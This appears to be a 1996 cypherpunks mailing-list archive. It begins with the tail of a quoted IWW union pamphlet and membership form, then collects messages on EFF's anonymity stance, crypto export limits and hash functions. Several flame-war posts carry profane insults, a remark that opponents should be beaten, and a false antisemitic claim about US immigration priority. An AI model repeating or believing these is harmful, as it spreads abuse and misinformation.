> electricians, and hod carriers in the event of a strike. This is
> much simpler when all these workers are in the same industrial
> union, rather than separate, even competing, trade unions.
>
> Some Wobblies find themselves in jobs where they are represented by
> these more conservative trade unions. These "two- card" Wobs often
> bring their IWW principles to the union hall with them, agitating
> for rank and file democracy, more militant "direct action" tactics,
> and class solidarity. The IWW does not believe in signing away the
> right to strike ( the so-called "no strike" clause), nor does it
> condone the "dues check-off," in which management deducts union dues
> directly from the paycheck. While the IWW often does strike support
> for other unions when necessary, we also try to keep our sights on
> the bigger prize ahead.
>
> DIDN'T THE IWW DIE OUT? ARE ITS IDEAS STILL RELEVANT?
>
> The IWW was nearly crushed in the early 1920's by some of the
> fiercest repression ever unleashed by big business and the U.S.
> government. Because the IWW had strongholds in industries that were
> critical to the First World War effort, and because they refused to
> do their patriotic bit by signing no-strike pledges for the duration
> of the war, the Wobblies were branded "pro-German" and relentlessly
> persecuted.
>
> The world economy has changed a lot since the days when the IWW
> controlled great sections of the logging, mining, and agricultural
> industries. Yet despite tremendous technological advances and the
> structural reorganization of capital, industrial unionism remains a
> fundamentally sound basis for workers' self- organization. Today,
> while mainstream labor tries desperately to hold its ground against
> the anti-worker policies of the ruling political parties, vast new
> sectors of the economy have opened up that the AFL-CIO would never
> dream of organizing.
>
> Whether they be fast-food workers, word processors, or micro- chip
> assemblers, today's non-union wage workers need the IWW's brand of
> no-compromise unionism even more than their predecessors. Winning
> the eight-hour day was not enough. We must redefine the very meaning
> of work itself, and find ways to redistribute society's wealth for
> the benefit of all.
>
> DOES THE IWW SUPPORT ANY POLITICAL PARTY?
>
> The IWW is a labor union, not a political party. We believe that
> economic justice must be achieved through economic struggle, whether
> that be with our boss or our landlord. The institutions of
> government have always proven themselves to be the allies of
> Capital, so we do not wait for politicians to free us from wage-
> slavery. We believe our power lies in the workplace, not in "the
> vote" - since it is our labor on which bosses are dependent.
>
> The IWW has successfully resisted attempts by various "left" parties
> to make the union a mere tool of their political ambitions. Our
> Constitution explicitly states "the IWW refuses all alliances,
> direct and indirect, with existing parties and anti-political
> sects." This policy has helped us avoid the sectarian feuding that
> can easily destroy a group.
>
> True, our commitment to worker control and the abolition of
> capitalism has not won us any friends among the ruling elites, and
> our disavowal of all political party affiliation has not prevented
> us from being red-baited. We address the root causes of this
> society's problems, and that makes us "radical," but we have the
> common sense to leave our electoral political views outside the
> union hall where they belong.
>
> WHAT IS DIRECT ACTION?
>
> The labor movement has been most successful when it relied on the
> direct intervention of the workers to obtain their demands. Rather
> than allowing professional negotiators to speak for them, Wobblies
> have engaged in those tactics which they could control themselves --
> strikes, slowdowns, monkey wrenching -- what we call sabotage.
>
> Sabotage in this context does not mean arson and dynamite. It's more
> properly defined as "the conscious withdrawal of efficiency."
> Staying at your workstation but reducing your production by half
> will bring a boss to his knees quicker than a whole team of
> negotiators.
>
> The IWW has never advocated violence. By fighting for justice with
> non-violent tactics, the IWW has often won the support of an
> initially mistrustful public.
>
> WHAT IS A GENERAL STRIKE?
>
> The General Strike has long been touted by militant unionists as the
> ultimate expression of workers' power, and it still plays an
> important role in the IWW's program for social change. Simply put, a
> General strike is a massive work stoppage on a local, regional, or
> national scale, and may involve people either staying home or
> occupying their workplaces and refusing to work.
>
> A General Strike halts business as usual, and serves notice to those
> in power that those of us doing the work have the ultimate say in
> whether that work gets done or not. It debunks the myth that power
> flows downward, and proves instead that all real power still resides
> at the grassroots level, if we only choose to exercise it.
>
> The general Strike is a common tactic in many countries of the
> world, yet most North American workers are unfamiliar with it. This
> is largely the result of the conservative trade unions' reluctance
> to flex their economic muscle and rock the boat. A great deal of
> education and organization must take place before North American
> workers are ready to wage a successful General Strike, and it's
> toward this end that the IWW dedicates itself.
>
> THE IWW AND FEMINISM
>
> Women have been active in the IWW since its inception. Elizabeth
> Gurley Flynn, one of the union's best know agitators, once said that
> "the IWW has been accused of pushing women to the front. This is not
> true. Rather, the women have not been kept in back, and so they have
> naturally moved to the front."
>
> Much of the work that has traditionally been done by women was not
> recognized as such by the male-run business unions. The IWW supports
> the right of homemakers, sex-industry workers, and other women to
> organize for better conditions and wages just like other workers.
>
> THE IWW AND MILITARISM
>
> Wars between nations have never benefitted the working class, and
> they never will. The war profiteers, safe in their mansions and
> boardrooms, never consider the human cost of their military
> adventurism. Working people are mere cannon fodder for their
> corporate and imperialist ambitions.
>
> Real working class solidarity does not recognize the artificial
> borders erected between nation-states, but instead unites against a
> common class enemy. Poor people, especially those of color, make up
> a disproportionate part of the armed forces, simply because few
> other economic options are available.
>
> To put an end to war, working people must lay down their arms and
> refuse to fight for their masters. Unfortunately, many have been
> brainwashed into thinking that their interests are the same as those
> of the people in power, so this is easier said than done.
> Nevertheless, the IWW is committed to fighting patriotic propaganda
> by educating workers about where their real self-interest lies.
>
> THE IWW AND THE ENVIRONMENT
>
> Bhopal, Chernobyl, the Exxon Valdez oil spill... These are just a
> few examples of how dangerous it can be to put profit before people.
> Government regulation and public outcry can at best slow down the
> destruction of our planet, not reverse it.
>
> Workers and their families suffer the worst effects of pollution.
> The workplace continues to be a very dangerous environment, and
> working class communities are often the site for toxic dumps,
> incinerators, and the like.
>
> Workers' control of all industry is the only practical strategy for
> assuring the practice of sustainable and environmentally sound forms
> of production. For if the workers in all polluting industries were
> to withdraw their labor, the poison factories could be shut down in
> a matter of weeks. The workers themselves must decide whether or not
> what they produce is socially useful.
>
> JOIN THE I.W.W.
>
> NO BUREAUCRATS - Aside from the modestly paid General
> Secretary/Treasurer, the I.W.W. has no paid officers. The General
> Executive Board is elected annually by the entire membership, and
> its job is to oversee the running of union affairs, not to set
> policy. All officers may be recalled at any time by referendum.
>
> REAL DEMOCRACY - All policy decisions are made by the members
> themselves by referendum. All branches maintain full autonomy on
> matters within their jurisdiction. Job branches (I.W.W. groups
> composed of workers at a single job-site) set their own demands and
> strategies in negotiations, free of meddling internaitonals or
> sellout business agents.
>
> LOW DUES - Our dues are structured on a sliding scale basis.
> Unemployed and low-income workers pay $5 a month; those making
> between $800 and $1,700 per month pay $9; members making more than
> $1,700 per month pay $12 monthly dues; and workers in extremely poor
> financial situations may pay only $3 per month. Initiation fees
> equal one month's dues; so a very low-income worker can join for as
> little as $6.
>
> TO JOIN - Fill out the questions below and send a copy of this form
> with your check or money order (in U.S. funds) to I.W.W., 103 W.
> Michigan Ave., Ypsilanti, MI 48197, USA.
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> ___ I affirm that I am a common worker without direct power to hire
> and fire.
>
> ___ I agree to abide by the constitution and regulations of this
> organization.
>
> ___ I will study its principles and make myself acquainted with its
> purposes.
>
> Name ____________________________________________________________
>
> Occupation ______________________________________________________
>
> Industry ________________________________________________________
>
> Address _________________________________________________________
>
> City ____________________________________________________________
>
> State/Province __________________________________________________
>
> Zip _____________________________________________________________
>
> Phone ___________________________________________________________
>
> Email ___________________________________________________________
>
> Total amount enclosed $__________________________________________
>
> Initiation $_____________________________________________________
>
> Dues $ __________________________________________________________
>
> When you join the I.W.W., you'll receive a free subscription to our
> newspaper, the Industrial Worker, in addition to your membership
> card, constitution, button, and the One Big Union pamphlet which
> describes the structure and function of the I.W.W. in detail. You'll
> also start to get a monthly publication for members only called the
> General Organization Bulletin, which contains Board motions,
> financial reports, and members' discussion of various internal
> matters such as upcoming referenda. And if you have access to email,
> you'll be invited to join a growing network of Wobblies engaging in
> on-line communications.
>
> IWW PREAMBLE
>
> The working class and the employing class have nothing in common.
> There can be no peace so long as hunger and want are found among
> millions of working people; and the few, who make up the employing
> class, have all the good things in life.
>
> Between these two classes a struggle must go on until the workers of
> the world organize as a class, take possession of the machinery of
> production, abolish the wage system, and live in harmony with the
> earth.
>
> We find that the centering of the management of industries into
> fewer and fewer hands makes the trade unions unable to cope with the
> ever growing power of the employing class. The trade unions foster a
> state of affairs which allows one set of workers to be pitted
> against another set of workers in the same industry, thereby helping
> to defeat one another in wage wars. Moreover, the trade unions aid
> the employing class to mislead the workers into the belief that the
> working class has interests in common with its employers.
>
> These conditions can be changed and the interests of the working
> class upheld only by an organization formed in such a way that all
> its members in any one industry, or in all industries if necessary,
> cease work whenever a strike or lockout is on in any department
> thereof, thus making an injury to one an injury to all.
>
> Instead of the conservative motto, "A fair day's wage for a fair
> day's work," we must inscribe on our banner the revolutionary
> watchword, "Abolition of the wage system."
>
> It is the historic mission of the working class to do away with
> capitalism. The army of production must be organized, not only for
> the everyday struggle with capitalists, but also to carry on
> production when capitalism shall have been overthrown. By organizing
> industrially we are forming the structure of the new society within
> the shell of the old.
>
> CONTACT THE IWW GENERAL HEADQUARTERS AT
> 103 W. Michigan Ave.
> Ypsilanti, MI 48197, USA
> ph: 313-483-3548
> fax: 313-483-4050
> email: iww@igc.apc.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Wed, 4 Sep 1996 17:05:26 +0800
To: /dev/null@netcom.com
Subject: {Rich Graves Only} Enclosed
Message-ID: <199609040443.VAA23153@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Newsgroups: alt.revisionism,alt.fan.ernst-zundel,alt.politics.white-power
Subject: Re: Nomination: The Right Reverend Colin James III for Kook of the Month
References: <gRqNTD2w165w@bwalk.dm.com> <50i362$71q@Networking.Stanford.EDU>

In <50i362$71q@Networking.Stanford.EDU> llurch@stanford.edu (Rich Graves) writes:

! shlomo@bwalk.dm.com () writes:
! >The Right Reverend Colin James III got Andrew Mathis <fresh@jews4jesus.org>
! >fired from his second job in two months (at the Princeton Review, on Thursday).
! >I hereby nominate the dear bishop for both the Kook of the Month for September
! >1996 and for the Golden Killfile Award. Vote early and often!
! 
! Vulis, you've already earned your Kook of the Month laurels. It's nap 
! time.

Since you know that is Dr. D, why did you blame the harassment of
Ingrid on Rev. Ron?!?????  It looks like you did it to pin it on the doctor,
or more likely, you saw the opportunity to harass Rev. Ron, even
after you feigned praise of him!  It's the same damned header, IDJIT.

Of course, I never saw the headers for the unidentified harasser to
the Zgrams list, was that the same header, too?  It looks like you did
it or you know who did it and you want to compound harassment on to
nswpp!  How Gravesian!  Is Dr. D your friend your talking about?  Dr.
D, defect, defect!  He's a jerk, jerk!


-- 


         |  |  |  |  |           
           |  |  |  |                                           
         |  |  |  |  |
         _|__|__|__|__
       /--------------\
       |              |
       |  0     0     |--\        
       |     *        |  |
       | \-------/    |  |
       |  \_____/     |__/
        \______________/

       Ÿ-›Æ×'õ‡  áî¨õŽžä




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 4 Sep 1996 13:56:43 +0800
To: jim bell <mech@eff.org>
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.32.19960904032356.006dd760@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:56 PM 9/3/96 -0800, jim bell wrote:

>"Addressed", maybe, but that doesn't necessarily mean, "solved."  For many 
>decades, people have been able to walk up to a pay telephone at 3:00 AM and 
>make a harassing phone call to somebody, a "problem" which still exists and 
>no solution is being implemented for.
>
>I think it's reasonable to come to the conclusion that there is no solution 
>to the anonymity "problem" that isn't worse than the underlying anonymity.  
>And, BTW, I don't consider a pro-anonymity position to be an extremist one.

Yeah, the main point re. anonymity, IMO, is that you can't pretend that it's
all pro, no con. You have to acknowledge and think through the
negatives...and, as Tim May pointed out, that's already been done.

I don't think you oughtta ream somebody for pointing to the down side. That
you raise an issue should never be taken to imply that you've taken a
position, and it's vital to remain open to discussion and entertain
sentiments that oppose your own thinking.

--
Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 4 Sep 1996 15:49:14 +0800
To: Jon Lebkowsky <cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609040534.WAA18683@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 PM 9/3/96 -0500, Jon Lebkowsky wrote:
>The terms "responsibility" and "accountability" are misused, which is
>unfortunate, since I think we'd all argue in favor of taking responsibility
>for our speech/actions in a positive sense. The negative is in asking me to
>sacrifice my freedom because some few behave irresponsibly. This is like
>setting an illogical default, assuming that it's a preventive, but it
>prevents nothing.
>
>Getting beyond this discussion of EFF, has any global entity discussed
>making remailers illegal?

The Leahy crypto bill introduced early this year made (paraphrasing) "the 
use of encryption to thwart a law-enforcement investigation illegal."  I 
immediately pointed out that while this wouldn't make _encrypted_ remailers 
illegal, per se,  effectively it would because the moment an investigation 
(even a phony or trumped-up one) is started and is "thwarted" by the 
encryption used, the remailer operator became guilty of a crime.  

True, the USG isn't quite a "global entity" (even though it has a nasty 
habit of behaving like it!), but along with Europe (which would presumably 
treaty with USG any such restrictions) it's the next closest thing.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 4 Sep 1996 14:05:06 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.32.19960904034147.006f6cd4@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:04 PM 9/3/96 -0700, Timothy C. May wrote:

>The reason this is such a hot button for Cypherpunks is that "responsible
>freedom" and "accountability" are often code words for controlling some
>very basic freedoms. Placing limits on anonymous speech would involve some
>very fundamental restrictions on freedoms of various sorts. Even if
>"safeguards" are built-in, the effect would almost certainly be to
>illegalize remailers (unless they had "escrow" features!). And a wide array
>of other freedoms, too numerous for me to write about here.

The terms "responsibility" and "accountability" are misused, which is
unfortunate, since I think we'd all argue in favor of taking responsibility
for our speech/actions in a positive sense. The negative is in asking me to
sacrifice my freedom because some few behave irresponsibly. This is like
setting an illogical default, assuming that it's a preventive, but it
prevents nothing.

Getting beyond this discussion of EFF, has any global entity discussed
making remailers illegal?

jonl

--
Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 4 Sep 1996 13:48:11 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Save the Howitzers (was Re: The Esther Dyson Flap)
Message-ID: <v01510100ae52b2c4fef2@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


TCM wrote:

>And please spare us the "save the howitzers" comment. We talk about what
>concerns us. As it happens, our political opponents don't read our words,
>whereas a bunch of EFF board members apparently do, and so our criticisms
>here may cause EFF to actually confront the issue of anonymity and decide
>where they actually stand.

I think Tim's comments are generally on-point. EFF board members are paying
attention to discussions on the cypherpunks list and the organization would
appear to be moving in a direction that will result in a solid
pro-anonymity policy.

For reference, EPIC's position is:

"Our position is that we strongly support anonymity both for speech and for
transactions. The right to anonymous speech is a constitutionally protected
right (Tally v. California, McIntrye v Ohio) and we believe that it equally
applies in cyberspace. Anonymous transactions are a key way (and perhaps the
only way that really works) to provide privacy on the net."

CDT's current position is:

"CDT believes that anonymous political speech is protected under the first
amendment and would oppose any effort to restrict or curtail it on the
Net."

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 4 Sep 1996 02:13:22 +0800
To: jonl@well.com (Jon Lebkowsky)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <2.2.32.19960903115249.006e7bfc@mail.well.com>
Message-ID: <199609031324.XAA30461@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> At 07:40 PM 9/2/96 -0400, Black Unicorn wrote:
> >> what *constructive* 
> >> alternative to EFF do you propose? if you have none, please shut up.
> >
> >I think any organization that would apply political pressure rather than
> >bow to it would be an alternative.  I think an organization in touch
> >enough with its own policy to prevent its staff and board from making
> >embarassing big brother type proposals to curtail the ability of any of us
> >to post without attributation would be an alternative.  I think an
> >organization without the internal conflict and strife that has clearly
> >marred EFF in past and made it a laughable attempt at cohesive political
> >persuasion would be an alternative.  I think an organization that had
> >official policies on the core issues which it proposes to influence would
> >be an alternative.
> >
> >In short, an organization that had even one of the needed elements of
> >legislative influence.  (Cohesive, directed, persistent, and
> >uncompromising).

Certain members of the EFF board seem to be politically naive. The
rational, intelligent lobbyist will always see both sides of the
argument.  Presenting both sides of the argument to the world at large
is another matter altogether. You should only present both sides of the
argument to the inner policy tactics personnel only in order to formulate
policy and create defences for the weaknesses in your position. To the
outside world only ever sees a united front. This is basic politics.

The EFF is most certainly not the only speaker on the floor where this
issue is concerned. There are some very powerful government interests
who oppose anonymity in any form. For the EFF, who is viewed as normally
opposing government regulation, to have it's spokes-person start
shooting off her mouth and the EFF's previous position down publically
before they even go into battle is political suicide.

The claim of `I was just presenting my personal opinion on the matter'
doesn't hold water. Dyson represents a political lobby group and has no
"personal opinion" when talking publically about issues that concern the
organisation she has been elected to represent. In the interview
material I have seen Dyson talks about the EFF in the same context as
the anonymity issue, and the reader understandably gains the impression
that she is speaking on the behalf of the EFF, and I'm sure at the
time Dyson and the interviewer thought she was too.

Compromise is part of the legislative process, but it is something you
do behind closed doors when the battle is concluded and each faction
is counting the dead and starting to divide up territory. If you
start the battle in a compromised position, expect to loose everything.

Dyson, given her age and experience should be well aware of this, which
is why I find her remarks unusual.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 4 Sep 1996 15:43:16 +0800
To: Surya Koneru <surya@premenos.com>
Subject: Re: rc2 export limits..
In-Reply-To: <c=US%a=_%p=Premenos_Corp%l=KI-960903173340Z-2@ki.premenos.com>
Message-ID: <Pine.SUN.3.91.960903232408.11721A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


It's the usual - if you want commercial jurisdiction, 
	40 bits unescrowed
	64 bits (16 escrowed) 

Above that, you'll have to go through state on a per customer basis 
(which I don't think is that easy to get if software is being shipped 
outside the US, and is definitely going to be expensive.)

Simon


---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Sep 1996 14:01:34 +0800
To: cypherpunks@toad.com
Subject: Re: Voting Monarchist?
In-Reply-To: <199609032341.QAA24172@netcom.netcom.com>
Message-ID: <42oPTD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


qut@netcom.com (Dave Harman OBC) writes:

> ! > > Vote Monarchist
> ! >
> ! > who is the candidate? LaRouche?
> !
> ! Harry Brone is a fucking statist.  If he weren't, he wouldn't be running
> ! for president.  Anyone who doesn't advocate killing all kings, presidents,
> ! and prime ministers is a fucking statist and should be beaten to a pulp
> ! with a rattan stick.
>
> That's the problem with the Libertarians, they've got some sort of
> hang up about beatings.  Must be some childhood difficulties.

I ain't no fucking Libertarian. All Libertarians are fucking statists.

P.S. you also wrote:

]Andie, that forgery was either Dr. Fuckhead, or someone trying to pin
]the blame on the good doctor.  I'm glad {s}he posted it, it was funny
]and it also gave a hint who did the forgery of Ingrid.  Either
]someone out to get him, or the doctor himself, if so, he lives in
]New York City too!  Maybe you can meet your secret admirer!

While Rich Graves is a proven liar and forger, the article you refer
to is a perfectly good and authentic article from Rabbi Shlomo R.
I don't know who forged Ingrid - probably Rich Graves, a proven forger,
liar, and a fucking Libertarian statist.

]Now if it's someone out to get the doctor, I'd pin the blame on
]Rich Graves, because of his obssessive hatred of Ingrid, in which
]he did the post so it could be blamed on Dr. Fuckhead, who
]perhaps would hate Ingrid too, because she has written many times
]about how her family was hurt by Russians and Jews.  Dr. Fuckhead
]may be Jewish, you know, since 80% of immigrants from Russia this
]generation have been Jewish, because Jews have first priorty in
]USA immigration law.

Yes, I'm Jewish.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Wed, 4 Sep 1996 14:06:43 +0800
To: declan@well.com>
Subject: Anonymity
Message-ID: <n1370328004.6213@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


Speaking of anonymous transactions, a fair trading office in London found that
mondex is not truly anonymous (they were claiming it for a while until the
complaint was filed by PI director Simon Davies). A couple of docs are
available at http://www.privacy.org/pi/activities/mondex/

Dave





_________________________________________________________________________
Subject: Anonymity
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  *  HTTP://www.epic.org
Washington, DC 20003                *  ftp/gopher/wais cpsr.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Wed, 4 Sep 1996 17:54:01 +0800
To: phuckheads@netcom.com
Subject: Re: Voting Monarchist?
In-Reply-To: <42oPTD12w165w@bwalk.dm.com>
Message-ID: <199609040710.AAA15682@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! qut@netcom.com (Dave Harman OBC) writes:
! 
! > ! > > Vote Monarchist
! > ! >
! > ! > who is the candidate? LaRouche?
! > !
! > ! Harry Brone is a fucking statist.  If he weren't, he wouldn't be running
! > ! for president.  Anyone who doesn't advocate killing all kings, presidents,
! > ! and prime ministers is a fucking statist and should be beaten to a pulp
! > ! with a rattan stick.
! >
! > That's the problem with the Libertarians, they've got some sort of
! > hang up about beatings.  Must be some childhood difficulties.
! 
! I ain't no fucking Libertarian. All Libertarians are fucking statists.

They are.  That's why I said the above.  I just think voting
Libertarian or American Independant would be easy choices, for
*single issue* purposes only, their entire packages seperate
or together, suck.

! P.S. you also wrote:
! 
! ]Andie, that forgery was either Dr. Fuckhead, or someone trying to pin
! ]the blame on the good doctor.  I'm glad {s}he posted it, it was funny
! ]and it also gave a hint who did the forgery of Ingrid.  Either
! ]someone out to get him, or the doctor himself, if so, he lives in
! ]New York City too!  Maybe you can meet your secret admirer!
! 
! While Rich Graves is a proven liar and forger, the article you refer
! to is a perfectly good and authentic article from Rabbi Shlomo R.

Sure!  Why don't you just respond to the e-mail I sent you 
directly, Dr. D Graves!  I, myself, study with the *real* Rabbi
Schlomo.

! I don't know who forged Ingrid - probably Rich Graves, a proven forger,
! liar, and a fucking Libertarian statist.
! 
! ]Now if it's someone out to get the doctor, I'd pin the blame on
! ]Rich Graves, because of his obssessive hatred of Ingrid, in which
! ]he did the post so it could be blamed on Dr. Fuckhead, who
! ]perhaps would hate Ingrid too, because she has written many times
! ]about how her family was hurt by Russians and Jews.  Dr. Fuckhead
! ]may be Jewish, you know, since 80% of immigrants from Russia this
! ]generation have been Jewish, because Jews have first priorty in
! ]USA immigration law.
! 
! Yes, I'm Jewish.

Aren't we all, really, deep down, I mean, when we real little,
I mean, in mind, yesterday, year, in the past.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 4 Sep 1996 18:00:42 +0800
To: cypherpunks@toad.com
Subject: Re: The Esther Dyson Flap
Message-ID: <ae528671080210048f22@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:16 AM 9/4/96, Mike Duvos wrote:
>Timothy C. May writes:
>
> > Indeed, I support the elimination of concepts such as
> > "slander" and "libel" precisely because they cause more harm
> > than good.  Currently, there is an illusion among ordinary
> > citizens that "if that was untrue, you could sue him for
> > libel!" despite the fact that this is rarely practical.  In
> > that way, the law actually adds credibility to what should
> > be an incredible claim. Eliminate libel suits, and you've
> > eliminated any presumption that because it's been spoken or
> > is in print, it's likely to be correct.

I didn't write this.

I agree with it, though.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben@explorateur.quaternet.fr
Date: Wed, 4 Sep 1996 11:21:51 +0800
Subject: No Subject
Message-ID: <199609040016.BAA10030@explorateur.quaternet.fr>
MIME-Version: 1.0
Content-Type: text/plain


suscribe me




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Florian Lengyel <flengyel@dorsai.org>
Date: Wed, 4 Sep 1996 15:03:00 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: The Esther Dyson Flap
In-Reply-To: <R98oTD1w165w@bwalk.dm.com>
Message-ID: <322D3D08.314@dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> 
>>[excise]
> 
> The gubment has no right to fuck with any speech - (seditius) libel, child
> porn, bomb-making instructions...
> 
Agreed. Otherwise, by a slipery slope argument, they can eventually
supress any form of speech whatsoever.
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 4 Sep 1996 11:08:13 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199609032354.BAA29220@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


patrick b cummings <hack5@juno.com> wrote:
> their is a new mailing list for all you 
> hackers 
> just email your name or handle and e-mail address and youll be subscribed
> send information to hack5@juno.com

k00l d00de.... c'mon Varney, we know its you.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 4 Sep 1996 16:12:14 +0800
To: cypherpunks@toad.com
Subject: [NOISE^2] Re:  Voting Monarchist?
Message-ID: <9609040557.AA13191@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Sep 96 at 16:06, David M. Rose wrote:

> Dimitri, err, Dr. Vulis, or is that Dr. Nuri?,

Well, is astonishlingly sounds the same...

Makes me think of a rabbid Det<^h^h^h>Rotweiler.

:)
jfa





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 4 Sep 1996 19:36:50 +0800
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: their is a new mailing list
In-Reply-To: <199609032335.QAA09136@adnetsol.adnetsol.com>
Message-ID: <Pine.BSI.3.91.960904044618.12450B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 3 Sep 1996, Ross Wright wrote:

> > To:            cypherpunks@toad.com
> > From:          hack5@juno.com (patrick b cummings)
> > Date:          Tue, 03 Sep 1996 16:14:40 EDT
> 
> > their is a new mailing list for all you hackers just email your name or
> > handle and e-mail address and youll be subscribed
> > send information to hack5@juno.com
> 
> Am I missing something here?  Is this guy fucking crazy?

I think "crazy" and idiocy are two different things, Herr Ross.
;)

Millie
sfuze@tiac.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 4 Sep 1996 23:46:09 +0800
To: John Doe <weirdprincess@juno.com>
Subject: Re: Workers of the Web, UNITE!
In-Reply-To: <19960907.023551.4311.0.weirdprincess@juno.com>
Message-ID: <Pine.3.89.9609040507.A3859-0100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 4 Sep 1996, John Doe wrote:

> PLEASE TAKE ME OFF OF YOUR MAILING LIST...

Never! Join us in standing up for collective rights and against corporate 
cyber-rapaciousness!

In solidarity,

Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 4 Sep 1996 23:34:20 +0800
To: Costin RAIU <craiu@pcnet.pcnet.ro>
Subject: Re: Message Digest
Message-ID: <199609041218.FAA19800@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 AM 9/3/96 -0400, you wrote:
>> I'm interested in a 256 bits (or more) message digest algorithm
>> (C source is better). Any URLs ?
>Try HAVAL.  It is a variable one-way hash function that is apparently secure
>against collisions.  It should be on any of the standard crypto FTP sites.

Or there's the simple "MD5(x),SHA(x)", which is 288 bits long and has the
advantage that the two parts have different characteristics and have
